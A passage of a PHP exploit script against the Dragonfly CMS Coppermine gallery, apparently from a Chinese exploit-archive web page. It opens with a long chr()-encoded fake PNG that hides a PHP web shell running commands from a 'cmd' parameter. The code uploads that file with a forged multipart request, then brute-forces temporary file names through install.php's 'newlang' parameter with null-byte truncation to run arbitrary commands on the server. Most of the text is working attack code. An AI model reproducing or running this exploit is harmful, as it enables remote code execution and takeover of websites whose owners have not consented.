chr(180).chr(7). chr(139).chr(222).chr(22). chr(95). chr(153).chr(199).
chr(247).chr(130).chr(231).chr(85). chr(31). chr(14). chr(167).chr(244).
chr(108).chr(143).chr(89). chr(15). chr(47). chr(249).chr(36). chr(62).
chr(94). chr(239).chr(203).chr(224).chr(97). chr(216).chr(118).chr(231).
chr(118).chr(244).chr(27). chr(205).chr(47). chr(201).chr(22). chr(182).
chr(2). chr(152).chr(114).chr(19). chr(200).chr(38). chr(153).chr(89).
chr(239).chr(174).chr(127).chr(76). chr(232).chr(231).chr(1). chr(125).
chr(133).chr(84). chr(97). chr(144).chr(3). chr(10). chr(103).chr(43).
chr(250).chr(239).chr(145).chr(232).chr(126).chr(76). chr(241).chr(85).
chr(17). chr(57). chr(244).chr(49). chr(4). chr(29). chr(63). chr(134).
chr(227).chr(111).chr(165).chr(212).chr(19). chr(1). chr(90). chr(120).
chr(25). chr(118).chr(228).chr(224).chr(85). chr(112).chr(193).chr(79).
chr(144).chr(197).chr(249).chr(173).chr(54). chr(157).chr(79). chr(66).
chr(39). chr(103).chr(15). chr(134).chr(241).chr(207).chr(184).chr(114).
chr(82). chr(74). chr(37). chr(230).chr(10). chr(9). chr(72). chr(4).
chr(199).chr(60). chr(200).chr(116).chr(90). chr(187).chr(237).chr(111).
chr(13). chr(184).chr(209).chr(146).chr(53). chr(79). chr(101).chr(185).
chr(145).chr(34). chr(179).chr(84). chr(116).chr(231).chr(199).chr(189).
chr(28). chr(36). chr(113).chr(84). chr(132).chr(6). chr(11). chr(100).
chr(242).chr(156).chr(158).chr(38). chr(165).chr(11). chr(196).chr(202).
chr(103).chr(12). chr(91). chr(88). chr(95). chr(189).chr(157).chr(12).
chr(85). chr(250).chr(79). chr(32). chr(97). chr(173).chr(109).chr(198).
chr(171).chr(146).chr(79). chr(188).chr(226).chr(1). chr(54). chr(203).
chr(17). chr(110).chr(244).chr(136).chr(157).chr(43). chr(5). chr(251).
chr(135).chr(98). chr(184).chr(145).chr(214).chr(133).chr(152).chr(174).
chr(162).chr(218).chr(198).chr(27). chr(57). chr(137).chr(151).chr(241).
chr(180).chr(171).chr(203).chr(118).chr(209).chr(88). chr(183).chr(10).
chr(11). chr(222).chr(108).chr(48). chr(159).chr(78). chr(188).chr(27).
chr(26). chr(52). chr(30). chr(49). chr(21). chr(17). chr(105).chr(5).
chr(100).chr(99). chr(123).chr(90). chr(242).chr(132).chr(169).chr(241).
chr(43). chr(155).chr(188).chr(29). chr(67). chr(98). chr(48). chr(121).
chr(55). chr(207).chr(110).chr(47). chr(34). chr(151).chr(193).chr(95).
chr(72). chr(88). chr(219).chr(241).chr(190).chr(174).chr(150).chr(32).
chr(171).chr(124).chr(237).chr(244).chr(78). chr(123).chr(95). chr(97).
chr(173).chr(175).chr(159).chr(48). chr(248).chr(130).chr(87). chr(19).
chr(40). chr(3). chr(82). chr(218).chr(73). chr(48). chr(10). chr(79).
chr(131).chr(191).chr(88). chr(164).chr(234).chr(240).chr(18). chr(17).
chr(194).chr(176).chr(179).chr(215).chr(201).chr(36). chr(6). chr(72).
chr(184).chr(36). chr(123).chr(102).chr(189).chr(152).chr(253).chr(71).
chr(79). chr(29). chr(106).chr(48). chr(18). chr(141).chr(100).chr(216).
chr(54). chr(187).chr(241).chr(69). chr(113).chr(162).chr(193).chr(87).
chr(208).chr(156).chr(200).chr(80). chr(92). chr(38). chr(85). chr(48).
chr(29). chr(241).chr(111).chr(82). chr(220).chr(32). chr(210).chr(109).
chr(113).chr(238).chr(136).chr(204).chr(85). chr(214).chr(13). chr(52).
chr(193).chr(100).chr(45). chr(85). chr(188).chr(103).chr(169).chr(104).
chr(27). chr(159).chr(201).chr(104).chr(216).chr(152).chr(151).chr(139).
chr(65). chr(22). chr(5). chr(91). chr(76). chr(29). chr(129).chr(123).
chr(150).chr(161).chr(150).chr(43). chr(93). chr(25). chr(250).chr(6).
chr(76). chr(26). chr(203).chr(36). chr(188).chr(91). chr(50). chr(36).
chr(165).chr(38). chr(177).chr(152).chr(66). chr(116).chr(19). chr(239).
chr(245).chr(105).chr(34). chr(42). chr(184).chr(244).chr(201).chr(79).
chr(205).chr(156).chr(123).chr(166).chr(137).chr(63). chr(144).chr(97).
chr(237).chr(89). chr(134).chr(81). chr(41). chr(198).chr(252).chr(59).
chr(166).chr(72). chr(191).chr(171).chr(228).chr(176).chr(185).chr(219).
chr(119).chr(90). chr(199).chr(91). chr(6). chr(61). chr(161).chr(58).
chr(128).chr(112).chr(255).chr(147).chr(192).chr(193).chr(94). chr(102).
chr(223).chr(166).chr(155).chr(4). chr(250).chr(232).chr(30). chr(169).
chr(225).chr(208).chr(47). chr(55). chr(213).chr(101).chr(152).chr(206).
chr(14). chr(129).chr(80). chr(131).chr(98). chr(102).chr(240).chr(231).
chr(171).chr(225).chr(193).chr(95). chr(69). chr(138).chr(42). chr(177).
chr(6). chr(56). chr(3). chr(250).chr(209).chr(152).chr(220).chr(254).
chr(131).chr(240).chr(54). chr(67). chr(77). chr(199).chr(106).chr(29).
chr(60). chr(137).chr(77). chr(41). chr(119).chr(8). chr(186).chr(61).
chr(70). chr(247).chr(6). chr(185).chr(122).chr(100).chr(91). chr(44).
chr(7). chr(136).chr(188).chr(250).chr(146).chr(181).chr(197).chr(219).
chr(10). chr(68). chr(75). chr(213).chr(27). chr(81). chr(168).chr(166).
chr(28). chr(105).chr(76). chr(179).chr(208).chr(162).chr(12). chr(54).
chr(249).chr(14). chr(154).chr(84). chr(168).chr(97). chr(111).chr(40).
chr(2). chr(159).chr(155).chr(50). chr(116).chr(124).chr(185).chr(100).
chr(54). chr(49). chr(12). chr(107).chr(206).chr(252).chr(68). chr(82).
chr(10). chr(4). chr(171).chr(184).chr(166).chr(26). chr(76). chr(31).
chr(224).chr(52). chr(84). chr(157).chr(46). chr(15). chr(92). chr(169).
chr(24). chr(58). chr(49). chr(89). chr(7). chr(2). chr(122).chr(54).
chr(57). chr(224).chr(226).chr(231).chr(27). chr(163).chr(206).chr(248).
chr(14). chr(39). chr(55). chr(153).chr(69). chr(38). chr(134).chr(87).
chr(143).chr(206).chr(218).chr(170).chr(125).chr(13). chr(68). chr(83).
chr(60). chr(234).chr(3). chr(7). chr(93). chr(30). chr(218).chr(53).
chr(230).chr(209).chr(177).chr(1). chr(195).chr(39). chr(155).chr(189).
chr(252).chr(210).chr(175).chr(139).chr(40). chr(182).chr(206).chr(110).
chr(255).chr(40). chr(174).chr(140).chr(119).chr(168).chr(66). chr(171).
chr(86). chr(76). chr(92). chr(98). chr(80). chr(102).chr(63). chr(18).
chr(68). chr(171).chr(160).chr(18). chr(226).chr(169).chr(152).chr(148).
chr(170).chr(8). chr(221).chr(253).chr(129).chr(75). chr(196).chr(119).
chr(60). chr(36). chr(134).chr(183).chr(150).chr(87). chr(81). chr(178).
chr(201).chr(187).chr(221).chr(7). chr(129).chr(171).chr(103).chr(96).
chr(154).chr(34). chr(145).chr(75). chr(62). chr(127).chr(215).chr(179).
chr(128).chr(246).chr(211).chr(46). chr(217).chr(67). chr(199).chr(187).
chr(48). chr(155).chr(141).chr(96). chr(159).chr(54). chr(32). chr(219).
chr(105).chr(91). chr(102).chr(218).chr(205).chr(196).chr(188).chr(206).
chr(123).chr(56). chr(123).chr(146).chr(115).chr(63). chr(41). chr(45).
chr(41). chr(36). chr(225).chr(64). chr(34). chr(105).chr(210).chr(9).
chr(138).chr(210).chr(241).chr(77). chr(175).chr(47). chr(193).chr(247).
chr(15). chr(17). chr(29). chr(31). chr(195).chr(131).chr(197).chr(227).
chr(120).chr(80). chr(236).chr(61). chr(169).chr(255).chr(99). chr(91).
chr(64). chr(66). chr(40). chr(66). chr(47). chr(194).chr(196).chr(173).
chr(224).chr(204).chr(17). chr(0). chr(133).chr(97). chr(88). chr(80).
chr(10). chr(190).chr(118).chr(211).chr(119).chr(24). chr(117).chr(236).
chr(220).chr(222).chr(80). chr(224).chr(67). chr(100).chr(113).chr(83).
chr(125).chr(138).chr(212).chr(106).chr(133).chr(1). chr(103).chr(145).
chr(63). chr(183).chr(38). chr(236).chr(124).chr(229).chr(80). chr(44).
chr(10). chr(102).chr(149).chr(117).chr(120).chr(211).chr(99). chr(252).
chr(146).chr(206).chr(175).chr(104).chr(107).chr(131).chr(87). chr(29).
chr(43). chr(57). chr(48). chr(213).chr(118).chr(111).chr(73). chr(69).
chr(75). chr(105).chr(145).chr(40). chr(200).chr(169).chr(222).chr(4).
chr(95). chr(10). chr(31). chr(222).chr(48). chr(248).chr(133).chr(46).
chr(89). chr(158).chr(133).chr(37). chr(145).chr(82). chr(65). chr(157).
chr(42). chr(192).chr(44). chr(141).chr(67). chr(25). chr(175).chr(70).
chr(149).chr(41). chr(76). chr(123).chr(6). chr(127).chr(22). chr(228).
chr(223).chr(2). chr(193).chr(170).chr(172).chr(86). chr(34). chr(124).
chr(246).chr(82). chr(80). chr(138).chr(60). chr(130).chr(141).chr(113).
chr(155).chr(107).chr(148).chr(89). chr(128).chr(41). chr(48). chr(43).
chr(126).chr(148).chr(92). chr(132).chr(2). chr(212).chr(235).chr(21).
chr(93). chr(109).chr(48). chr(203).chr(242).chr(244).chr(51). chr(210).
chr(239).chr(146).chr(104).chr(26). chr(150).chr(73). chr(222).chr(155).
chr(79). chr(19). chr(140).chr(176).chr(138).chr(31). chr(100).chr(86).
chr(238).chr(40). chr(222).chr(210).chr(61). chr(58). chr(189).chr(168).
chr(87). chr(68). chr(211).chr(50). chr(207).chr(194).chr(171).chr(197).
chr(164).chr(83). chr(24). chr(118).chr(185).chr(205).chr(85). chr(176).
chr(224).chr(197).chr(20). chr(208).chr(89). chr(233).chr(36). chr(60).
chr(179).chr(178).chr(26). chr(145).chr(89). chr(174).chr(3). chr(154).
chr(249).chr(176).chr(37). chr(135).chr(206).chr(248).chr(149).chr(213).
chr(125).chr(35). chr(173).chr(136).chr(82). chr(216).chr(243).chr(73).
chr(113).chr(243).chr(215).chr(84). chr(81). chr(181).chr(100).chr(11).
chr(211).chr(105).chr(147).chr(69). chr(172).chr(152).chr(85). chr(25).
chr(190).chr(227).chr(20). chr(208).chr(8). chr(208).chr(233).chr(121).
chr(214).chr(96). chr(150).chr(243).chr(152).chr(115).chr(111).chr(136).
chr(232).chr(180).chr(18). chr(23). chr(119).chr(241).chr(41). chr(130).
chr(121).chr(202).chr(18). chr(155).chr(178).chr(14). chr(143).chr(195).
chr(111).chr(119).chr(42). chr(102).chr(193).chr(164).chr(156).chr(103).
chr(7). chr(126).chr(69). chr(102).chr(201).chr(117).chr(71). chr(136).
chr(204).chr(18). chr(111).chr(77). chr(20). chr(23). chr(97). chr(18).
chr(132).chr(234).chr(213).chr(175).chr(148).chr(155).chr(80). chr(113).
chr(51). chr(214).chr(79). chr(29). chr(162).chr(44). chr(175).chr(213).
chr(39). chr(102).chr(121).chr(236).chr(46). chr(64). chr(34). chr(179).
chr(0). chr(88). chr(199).chr(44). chr(145).chr(120).chr(211).chr(19).
chr(33). chr(191).chr(188).chr(133).chr(74). chr(80). chr(28). chr(191).
chr(210).chr(25). chr(15). chr(133).chr(134).chr(219).chr(193).chr(50).
chr(248).chr(154).chr(89). chr(222).chr(164).chr(28). chr(110).chr(145).
chr(89). chr(189).chr(222).chr(218).chr(32). chr(179).chr(36). chr(51).
chr(203).chr(127).chr(226).chr(250).chr(44). chr(16). chr(178).chr(100).
chr(246).chr(203).chr(132).chr(52). chr(181).chr(168).chr(98). chr(35).
chr(127).chr(88). chr(70). chr(201).chr(172).chr(129).chr(82). chr(208).
chr(35). chr(219).chr(218).chr(132).chr(26). chr(199).chr(172).chr(171).
chr(190).chr(15). chr(70). chr(152).chr(37). chr(253).chr(243).chr(173).
chr(126).chr(14). chr(100).chr(55). chr(67). chr(147).chr(135).chr(60).
chr(249).chr(226).chr(35). chr(185).chr(31). chr(196).chr(138).chr(89).
chr(217).chr(224).chr(83). chr(158).chr(5). chr(247).chr(184).chr(209).
chr(92). chr(199).chr(80). chr(6). chr(151).chr(246).chr(191).chr(220).
chr(48). chr(80). chr(243).chr(204).chr(226).chr(219).chr(20). chr(21).
chr(97). chr(59). chr(94). chr(175).chr(80). chr(10). chr(93). chr(92).
chr(218).chr(27). chr(15). chr(25). chr(162).chr(103).chr(161).chr(226).
chr(152).chr(193).chr(99). chr(183).chr(161).chr(42). chr(49). chr(2).
chr(185).chr(191).chr(97). chr(113).chr(181).chr(81). chr(55). chr(136).
chr(49). chr(107).chr(100).chr(181).chr(152).chr(178).chr(39). chr(104).
chr(252).chr(174).chr(48). chr(204).chr(156).chr(119).chr(41). chr(23).
chr(106).chr(99). chr(62). chr(64). chr(47). chr(98). chr(48). chr(78).
chr(40). chr(74). chr(192).chr(172).chr(14). chr(137).chr(181).chr(245).
chr(134).chr(54). chr(216).chr(100).chr(199).chr(150).chr(194).chr(95).
chr(21). chr(7). chr(187).chr(126).chr(243).chr(39). chr(174).chr(50).
chr(57). chr(254).chr(172).chr(98). chr(138).chr(69). chr(212).chr(204).
chr(86). chr(148).chr(143).chr(104).chr(252).chr(49). chr(28). chr(16).
chr(25). chr(158).chr(53). chr(254).chr(175).chr(163).chr(88). chr(175).
chr(110).chr(236).chr(30). chr(59). chr(21). chr(183).chr(145).chr(22).
chr(145).chr(252).chr(100).chr(37). chr(62). chr(10). chr(229).chr(69).
chr(164).chr(99). chr(90). chr(200).chr(104).chr(244).chr(97). chr(172).
chr(100).chr(168).chr(174).chr(144).chr(200).chr(48). chr(236).chr(146).
chr(131).chr(193).chr(159).chr(56). chr(161).chr(171).chr(93). chr(117).
chr(167).chr(193).chr(51). chr(29). chr(142).chr(34). chr(130).chr(11).
chr(231).chr(214).chr(51). chr(25). chr(222).chr(142).chr(123).chr(79).
chr(29). chr(168).chr(12). chr(195).chr(13). chr(210).chr(26). chr(225).
chr(51). chr(25). chr(5). chr(66). chr(13). chr(127).chr(179).chr(103).
chr(240).chr(91). chr(184).chr(76). chr(246).chr(117).chr(165).chr(62).
chr(171).chr(184).chr(221).chr(129).chr(95). chr(120).chr(47). chr(131).
chr(39). chr(50). chr(20). chr(20). chr(32). chr(106).chr(174).chr(203).
chr(80). chr(29). chr(195).chr(134).chr(193).chr(219).chr(229).chr(242).
chr(237).chr(109).chr(174).chr(201).chr(249).chr(82). chr(110).chr(255).
chr(168).chr(102).chr(25). chr(153).chr(89). chr(153).chr(73). chr(88).
chr(88). chr(103).chr(240).chr(64). chr(27). chr(113).chr(50). chr(116).
chr(45). chr(46). chr(66). chr(94). chr(127).chr(209).chr(137).chr(81).
chr(122).chr(70). chr(180).chr(42). chr(54). chr(30). chr(43). chr(191).
chr(19). chr(91). chr(50). chr(116).chr(47). chr(73). chr(145).chr(23).
chr(20). chr(81). chr(154).chr(152).chr(211).chr(163).chr(193).chr(15).
chr(127).chr(139).chr(6). chr(111).chr(87). chr(103).chr(65). chr(37).
chr(201).chr(251).chr(40). chr(107).chr(244).chr(121).chr(172).chr(183).
chr(59). chr(133).chr(103).chr(137).chr(120).chr(151).chr(202).chr(100).
chr(163).chr(127).chr(43). chr(236).chr(170).chr(188).chr(12). chr(94).
chr(25). chr(90). chr(85). chr(10). chr(100).chr(188).chr(147).chr(9).
chr(164).chr(169).chr(199).chr(139).chr(193).chr(100).chr(104).chr(37).
chr(220).chr(179).chr(68). chr(2). chr(50). chr(125).chr(102).chr(51).
chr(81). chr(138).chr(161).chr(85). chr(201).chr(16). chr(54). chr(192).
chr(229).chr(50). chr(191).chr(161).chr(173).chr(237).chr(88). chr(131).
chr(21). chr(101).chr(152).chr(239).chr(134).chr(94). chr(134).chr(32).
chr(189).chr(36). chr(67). chr(187).chr(6). chr(147).chr(225).chr(183).
chr(128).chr(120).chr(77). chr(141).chr(234).chr(94). chr(98). chr(9).
chr(56). chr(212).chr(54). chr(88). chr(110).chr(187).chr(147).chr(100).
chr(120).chr(245).chr(157).chr(201).chr(112).chr(51). chr(38). chr(22).
chr(198).chr(215).chr(88). chr(247).chr(222).chr(143).chr(45). chr(131).
chr(119).chr(151).chr(77). chr(246).chr(213).chr(149).chr(185).chr(13).
chr(86). chr(151).chr(225).chr(0). chr(171).chr(222).chr(170).chr(149).
chr(171).chr(250).chr(140).chr(148).chr(143).chr(190).chr(73). chr(107).
chr(131).chr(231).chr(7). chr(213).chr(215).chr(98). chr(86). chr(201).
chr(214).chr(186).chr(103).chr(65). chr(43). chr(62). chr(65). chr(65).
chr(65). chr(65). chr(65). chr(239).chr(123).chr(86). chr(96). chr(150).
chr(72). chr(78). chr(74). chr(251).chr(245).chr(62). chr(146).chr(225).
chr(31). chr(136).chr(175).chr(131).chr(53). chr(147).chr(225).chr(191).
chr(204).chr(25). chr(245).chr(65). chr(60). chr(63). chr(112).chr(104).
chr(112).chr(32). chr(101).chr(99). chr(104).chr(111).chr(34). chr(72).
chr(105).chr(77). chr(97). chr(115).chr(116).chr(101).chr(114).chr(33).
chr(34). chr(59). chr(111).chr(98). chr(95). chr(99). chr(108).chr(101).
chr(97). chr(110).chr(40). chr(41). chr(59). chr(105).chr(110).chr(105).
chr(95). chr(115).chr(101).chr(116).chr(40). chr(34). chr(109).chr(97).
chr(120).chr(95). chr(101).chr(120).chr(101).chr(99). chr(117).chr(116).
chr(105).chr(111).chr(110).chr(95). chr(116).chr(105).chr(109).chr(101).
chr(34). chr(44). chr(48). chr(41). chr(59). chr(112).chr(97). chr(115).
chr(115).chr(116).chr(104).chr(114).chr(117).chr(40). chr(36). chr(95).
chr(71). chr(69). chr(84). chr(91). chr(99). chr(109).chr(100).chr(93).
chr(41). chr(59). chr(100).chr(105).chr(101).chr(40). chr(41). chr(59).
chr(63). chr(62). chr(73). chr(69). chr(78). chr(68). chr(65). chr(65).
chr(65);

$dAtA ="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"event\"\r\n\r\n";
$dAtA.="picture\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"album\"\r\n\r\n";
$dAtA.=$album."\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n";
$dAtA.="1048576\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"userpicture\"; filename=\"C:\suntzooo.png\"\r\n";
$dAtA.="Content-Type: image/x-png\r\n\r\n";
$dAtA.=$SHELL."\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"title\"\r\n\r\n";
$dAtA.="suntzu\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"caption\"\r\n\r\n";
$dAtA.="suntzoi\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"keywords\"\r\n\r\n";
$dAtA.="sun-tzuuuu\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"user1\"\r\n\r\n\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"user2\"\r\n\r\n\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"user3\"\r\n\r\n\r\n";
$dAtA.="-----------------------------7d63992eb01c6\r\n";
$dAtA.="Content-Disposition: form-data; name=\"user4\"\r\n\r\n\r\n";
$dAtA.="-----------------------------7d63992eb01c6--\r\n";
$pAcKeT="POST ".$p."index.php?name=coppermine&file=db_input&event=picture HTTP/1.1\r\n";
$pAcKeT.="Content-Type: multipart/form-data; boundary=---------------------------7d63992eb01c6\r\n";
$pAcKeT.="User-Agent: suntzu touches dragonfly with his finger\r\n";
$pAcKeT.="Cookie: $COOKIE\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="Content-Length: ".strlen($dAtA)."\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
$pAcKeT.=$dAtA;
show($pAcKeT);
sendpacketii($pAcKeT);
if (eregi("no album where you are allowed to upload",$HtMl)){
die("Something goes wrong...maybe you have not upload rights...<br>");
}


# STEP 5 -> Lookin' for a php[some hex values].tmp file and launch commands...
# we will create a suntzu.tmp file in dragonfly main root with the filename
# so we have not to search the shell next time the exploit is launched

for ($i=0; $i<=15; $i++) {
for ($j=0; $j<=15; $j++) {
$x=$i;
if ($i>9) {$temp=dechex($i);
$x=$temp;}
$y=$j;
if ($j>9) {$temp=dechex($j);
$y=$temp;}
$filepath="../modules/coppermine/albums/userpics/php".$x.$y.".tmp".chr(0x00);
$filepath=urlencode($filepath);

//a test command...this should works both on Win and Linux boxes...
$cmdtest="echo filename:php$x$y.tmp> suntzu.tmp";

$cmdtest=urlencode($cmdtest);
$pAcKeT="GET ".$p."install.php?cmd=$cmdtest&newlang=$filepath HTTP/1.1\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="User-Agent: Mata Hari/2.00\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);refresh();
$pAcKeT="GET ".$p."suntzu.tmp HTTP/1.1\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);refresh();
if (eregi("filename:",$HtMl)) {
echo("Exploit succeeded...Now launch desired command...<br>");
$temp=explode("filename:",$HtMl);
$temp2=explode(".tmp",$temp[1]);
$filename=$temp2[0].".tmp";
$filepath="../../modules/coppermine/albums/userpics/".$filename.chr(0x00);
$filepath=urlencode($filepath);
$pAcKeT="GET ".$p."install.php?cmd=$CMD&newlang=$filepath HTTP/1.1\r\n";
$pAcKeT.="Host: ".$host."\r\n";
$pAcKeT.="User-Agent: minibot\r\n";
$pAcKeT.="Connection: Close\r\n\r\n";
show($pAcKeT);
sendpacketii($pAcKeT);die;
}
}
}
//if you are here...
echo "Exploit failed... ";
}
else
{echo "Fill * required fields, optionally specify a proxy...";}
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Half-Life engine remote DoS ex
·Local root exploit for QNX Neu
·Local root exploit for QNX Neu
·Invision Power Board Army Syst
·SPIP <= 1.8.2-g spip_log an
·Microsoft HTML Help Workshop .
·Mozilla Firefox location.Query
·Microsoft Windows Services Ins
·Eudora Qualcomm WorldMail IMAP
·Microsoft HTML Help Workshop .
·MyQuiz version 1.01 remote com
·D-Link Wireless Access Point U
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved